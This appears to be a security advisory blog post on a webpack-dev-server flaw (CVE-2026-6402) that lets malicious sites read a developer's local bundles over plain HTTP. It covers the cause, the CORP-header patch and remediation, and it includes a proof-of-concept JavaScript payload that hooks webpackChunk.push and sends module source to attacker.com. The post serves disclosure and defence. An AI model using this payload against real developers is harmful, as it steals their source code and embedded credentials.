May 18, 2026·6 min read·22 visits
webpack-dev-server <= 5.2.3 fails to block cross-origin script inclusions over HTTP due to missing Fetch Metadata headers, enabling attackers to steal local source code by hooking global webpack registry functions.
A medium-severity vulnerability in webpack-dev-server versions up to 5.2.3 allows malicious external websites to exfiltrate an application's entire source code when the development server is accessed over plain HTTP. The vulnerability leverages cross-origin script inclusion to bypass origin restrictions.
webpack-dev-server is a development utility that provides live reloading and serves compiled frontend assets during application development. The utility compiles source code into JavaScript bundles and exposes them via a local HTTP server. These bundles contain the entirety of the application's client-side source code, frequently including unminified logic, development credentials, and internal API endpoints.
CVE-2026-6402 is a cross-origin source code exposure vulnerability affecting versions 5.2.3 and earlier. The vulnerability is tracked under CWE-749 (Exposed Dangerous Method or Function). The issue arises when the server is accessed over plain HTTP, allowing malicious external websites to bypass security controls and load the bundles via cross-origin script inclusion.
The vulnerability stems from an architectural weakness in how webpack-dev-server validates incoming cross-origin requests. A prior security patch for CVE-2025-30359 introduced validation based on Fetch Metadata request headers (Sec-Fetch-Mode and Sec-Fetch-Site). Because modern browsers omit these headers for non-trustworthy origins such as standard HTTP, the server's middleware defaults to an allow state.
The technical root cause involves a combination of browser security policies and the execution model of webpack bundles. Browsers enforce the Same-Origin Policy (SOP) to restrict cross-origin data access. However, HTML <script> tags inherently bypass the SOP to allow the execution of cross-origin resources. While the host page cannot read the raw text of the fetched script natively, it can intercept the execution environment if the script interacts with global variables.
Webpack bundles are designed to register their contained modules into a global registry for hot module replacement and chunk loading. The registry typically takes the form of a global array or object, such as window.webpackChunk or self.webpackHotUpdate. When a bundle executes, it immediately pushes its internal module definitions to these global structures.
If a malicious website includes the target developer's local bundle via a <script> tag, the browser executes the bundle within the context of the attacker's page. The attacker can pre-define the global registry structures and intercept the modules as they are registered. The failure of the server to block the initial cross-origin request allows the malicious page to capture the application's source code during execution.
The vulnerable implementation relied entirely on request-side validation using Fetch Metadata headers. The server checked for the presence of Sec-Fetch-Site: cross-site to block unauthorized inclusions. When browsers omitted these headers over plain HTTP connections, the validation logic failed open, permitting the HTTP request to succeed.
The patch for CVE-2026-6402 shifts the defense mechanism from request validation to response headers. The maintainers implemented the Cross-Origin-Resource-Policy: same-origin (CORP) header. CORP is a robust, response-side security control that instructs the browser to block the resource from loading in cross-origin contexts, regardless of the request type or HTML tag used.
// Patch implemented in lib/Server.js
if (
this.options.allowedHosts !== "all" &&
!this.isUserCORSWildcardEnabled()
) {
res.setHeader("Cross-Origin-Resource-Policy", "same-origin");
}The patched code automatically applies the CORP header unless open access is explicitly configured. When a modern browser receives this response header, it enforces the restriction at the network layer and prevents the script from executing in the malicious page context. This comprehensively closes the cross-origin inclusion vector.
Exploitation requires an attacker to successfully target a developer actively running the vulnerable webpack-dev-server locally. The attacker must host a malicious webpage and entice the developer to visit it. The attack relies on the predictable local network configuration typically used by development environments, such as localhost or 127.0.0.1 on port 8080 or 3000.
The attacker's webpage defines a proxy object or overrides the expected global webpack registry function before including the target bundle. The JavaScript payload hooks the push method of window.webpackChunk. When the bundle loads, it invokes this modified function, passing the module identifiers and raw source code directly into the attacker's control.
// Example exploit payload hosted on attacker site
window.webpackChunk = {
push: function(chunk) {
const [id, modules] = chunk;
for (const moduleId in modules) {
// Intercept and exfiltrate the raw source code
fetch('https://attacker.com/steal', {
method: 'POST',
body: modules[moduleId].toString()
});
}
}
};Following the definition of the hook, the malicious page injects a <script src="http://localhost:8080/main.js"></script> tag. The browser requests the file, the server responds with the bundle, and the source code is subsequently sent to the attacker-controlled server.
The primary impact of CVE-2026-6402 is the complete loss of source code confidentiality. Front-end codebases frequently contain sensitive intellectual property, proprietary algorithms, and hardcoded internal endpoints. During development, engineers may also temporarily hardcode administrative credentials or access tokens, which become exposed within the bundle.
The vulnerability carries a CVSS 3.1 Base Score of 5.3. Exploitation requires user interaction, specifically the developer visiting a malicious site while the server is running. The attack complexity evaluates to High because the attacker must accurately target the local port the development server is bound to.
The impact is constrained by newer browser-level protections. Chromium-based browsers (Chrome 142+) implement Local Network Access (LNA) restrictions by default. LNA prevents public internet sites from initiating requests to private network addresses without preflight consent. Developers using Firefox, Safari, or older Chromium versions remain exposed to this attack vector.
The primary remediation is upgrading webpack-dev-server to version 5.2.4 or later. This release correctly implements the Cross-Origin-Resource-Policy header, mitigating the vulnerability universally across all compliant browsers. Development teams must enforce minimum version requirements in their dependency manifests to ensure the patch applies consistently.
For environments where immediate patching is not feasible, developers must apply configuration-based workarounds. Running the development server over TLS utilizing the --https flag ensures the connection operates in a secure context. In secure contexts, browsers append the necessary Fetch Metadata headers, allowing the legacy CVE-2025-30359 mitigations to function as intended.
Administrators must also avoid configuring allowedHosts: 'all' within the webpack configuration. Restricting the allowedHosts directive to specific, trusted domains reduces the attack surface by enforcing strict host header validation on incoming requests.
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
webpack-dev-server openjs | <= 5.2.3 | 5.2.4 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-749 |
| Attack Vector | Network (Requires User Interaction) |
| CVSS Score | 5.3 (Medium) |
| EPSS Score | 0.00033 |
| Impact | High Confidentiality Loss |
| Exploit Status | Proof of Concept |
| CISA KEV | Not Listed |
The software provides an API or similar interface that exposes a method or function that is dangerous or allows an attacker to manipulate the environment.
An integer truncation vulnerability (CWE-197) exists in SQLite before version 3.50.2 during the processing of aggregate queries with more than 32,767 distinct column references. This causes an internal 32-bit counter to truncate to a signed 16-bit integer, producing negative values that cause out-of-bounds heap operations in release builds.
An integer overflow vulnerability in the Windows kernel-mode HTTP driver (HTTP.sys) allows an unauthenticated remote attacker to execute arbitrary code with kernel privileges or cause a Denial of Service via a specially crafted sequence of HTTP request headers.
A memory corruption vulnerability exists in the FTS5 (Full-Text Search 5) extension of SQLite prior to version 3.53.2. An attacker can construct a malicious database file containing corrupt FTS5 page data. Querying this database triggers out-of-bounds reads and heap-based buffer overflows, potentially causing a crash or arbitrary code execution.
A mass assignment vulnerability (CWE-915) in n8n's self-service settings API endpoint (PATCH /me/settings) allows authenticated Single Sign-On (SSO) users to disable SSO enforcement for their accounts by injecting administrative parameters. This bypasses organizational identity provider controls and multi-factor authentication (MFA).
CVE-2026-55699 (also identified as GHSA-4gxm-v5v7-fqc4) is a critical path traversal and arbitrary directory deletion vulnerability in the pnpm package manager. The issue exists because the manifest validation process fails to prevent relative path segments within the package 'bin' keys. When a malicious package containing structured path traversal markers is globally installed and later manipulated, pnpm resolves the target paths through path.join() and passes the resolved paths to a recursive deletion function, resulting in arbitrary directory removal.
A path traversal vulnerability in pnpm stage download allows malicious registries or compromised package manifests to overwrite arbitrary files on the victim's filesystem via unvalidated package name and version fields.